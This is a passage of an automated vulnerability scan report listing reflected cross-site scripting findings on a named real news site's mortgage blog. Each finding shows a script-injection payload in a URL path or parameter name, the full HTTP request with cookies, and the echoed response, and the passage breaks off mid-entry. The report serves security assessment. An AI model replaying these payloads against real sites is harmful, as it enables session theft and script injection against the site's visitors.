The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4782"><script>alert(1)</script>6666c9a16c7 was submitted in the REST URL parameter 2. This input was echoed as b4782\"><script>alert(1)</script>6666c9a16c7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009/07b4782"><script>alert(1)</script>6666c9a16c7/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:13:31 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:13:33 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62652
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/07b4782\"><script>alert(1)</script>6666c9a16c7/feed/" /> ...[SNIP]...
1.302. http://mortgage.ocregister.com/2009/07/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2009/07/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a46b7"><script>alert(1)</script>653aab2ba5c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a46b7\"><script>alert(1)</script>653aab2ba5c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009/07/?a46b7"><script>alert(1)</script>653aab2ba5c=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:13:16 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 113888
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2009 July - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/07/?a46b7\"><script>alert(1)</script>653aab2ba5c=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e95c"><script>alert(1)</script>65109d80feb was submitted in the REST URL parameter 1. This input was echoed as 2e95c\"><script>alert(1)</script>65109d80feb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /20092e95c"><script>alert(1)</script>65109d80feb/08/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:13:31 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:13:32 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20092e95c\"><script>alert(1)</script>65109d80feb/08/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41f3f"><script>alert(1)</script>c6967a59290 was submitted in the REST URL parameter 2. This input was echoed as 41f3f\"><script>alert(1)</script>c6967a59290 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009/0841f3f"><script>alert(1)</script>c6967a59290/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:13:37 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:13:38 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/0841f3f\"><script>alert(1)</script>c6967a59290/feed/" /> ...[SNIP]...
1.305. http://mortgage.ocregister.com/2009/08/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2009/08/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91a1e"><script>alert(1)</script>468ca413bb4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 91a1e\"><script>alert(1)</script>468ca413bb4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009/08/?91a1e"><script>alert(1)</script>468ca413bb4=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:13:19 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 109320
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2009 August - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/08/?91a1e\"><script>alert(1)</script>468ca413bb4=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e4e9"><script>alert(1)</script>62c20fd5f6c was submitted in the REST URL parameter 1. This input was echoed as 3e4e9\"><script>alert(1)</script>62c20fd5f6c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /20093e4e9"><script>alert(1)</script>62c20fd5f6c/09/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:13:17 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:13:17 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20093e4e9\"><script>alert(1)</script>62c20fd5f6c/09/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43615"><script>alert(1)</script>66b5d481b5d was submitted in the REST URL parameter 2. This input was echoed as 43615\"><script>alert(1)</script>66b5d481b5d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009/0943615"><script>alert(1)</script>66b5d481b5d/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:13:21 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:13:21 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62651
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/0943615\"><script>alert(1)</script>66b5d481b5d/feed/" /> ...[SNIP]...
1.308. http://mortgage.ocregister.com/2009/09/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2009/09/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fef8a"><script>alert(1)</script>5f63aeef702 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fef8a\"><script>alert(1)</script>5f63aeef702 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009/09/?fef8a"><script>alert(1)</script>5f63aeef702=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:13:11 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 97531
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2009 September - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/09/?fef8a\"><script>alert(1)</script>5f63aeef702=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 766d2"><script>alert(1)</script>feecef77490 was submitted in the REST URL parameter 1. This input was echoed as 766d2\"><script>alert(1)</script>feecef77490 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009766d2"><script>alert(1)</script>feecef77490/10/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:13:36 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:13:36 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009766d2\"><script>alert(1)</script>feecef77490/10/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95802"><script>alert(1)</script>54504d64364 was submitted in the REST URL parameter 2. This input was echoed as 95802\"><script>alert(1)</script>54504d64364 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009/1095802"><script>alert(1)</script>54504d64364/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:13:50 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:13:50 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62643
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/1095802\"><script>alert(1)</script>54504d64364/feed/" /> ...[SNIP]...
1.311. http://mortgage.ocregister.com/2009/10/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2009/10/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef3c3"><script>alert(1)</script>f4108a4af6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ef3c3\"><script>alert(1)</script>f4108a4af6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009/10/?ef3c3"><script>alert(1)</script>f4108a4af6=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:13:11 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 108827
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2009 October - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/10/?ef3c3\"><script>alert(1)</script>f4108a4af6=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39ed8"><script>alert(1)</script>ab1683ae201 was submitted in the REST URL parameter 1. This input was echoed as 39ed8\"><script>alert(1)</script>ab1683ae201 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /200939ed8"><script>alert(1)</script>ab1683ae201/11/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:13:00 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:13:01 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62653
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/200939ed8\"><script>alert(1)</script>ab1683ae201/11/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e730d"><script>alert(1)</script>71e0e703e3e was submitted in the REST URL parameter 2. This input was echoed as e730d\"><script>alert(1)</script>71e0e703e3e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009/11e730d"><script>alert(1)</script>71e0e703e3e/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:13:03 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:13:04 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62653
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/11e730d\"><script>alert(1)</script>71e0e703e3e/feed/" /> ...[SNIP]...
1.314. http://mortgage.ocregister.com/2009/11/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2009/11/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84d57"><script>alert(1)</script>16d0da66f08 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 84d57\"><script>alert(1)</script>16d0da66f08 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009/11/?84d57"><script>alert(1)</script>16d0da66f08=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:12:57 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 105718
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2009 November - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/11/?84d57\"><script>alert(1)</script>16d0da66f08=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce109"><script>alert(1)</script>3534b7ba531 was submitted in the REST URL parameter 1. This input was echoed as ce109\"><script>alert(1)</script>3534b7ba531 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009ce109"><script>alert(1)</script>3534b7ba531/12/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:13:00 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:13:02 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009ce109\"><script>alert(1)</script>3534b7ba531/12/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1391f"><script>alert(1)</script>20503540395 was submitted in the REST URL parameter 2. This input was echoed as 1391f\"><script>alert(1)</script>20503540395 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
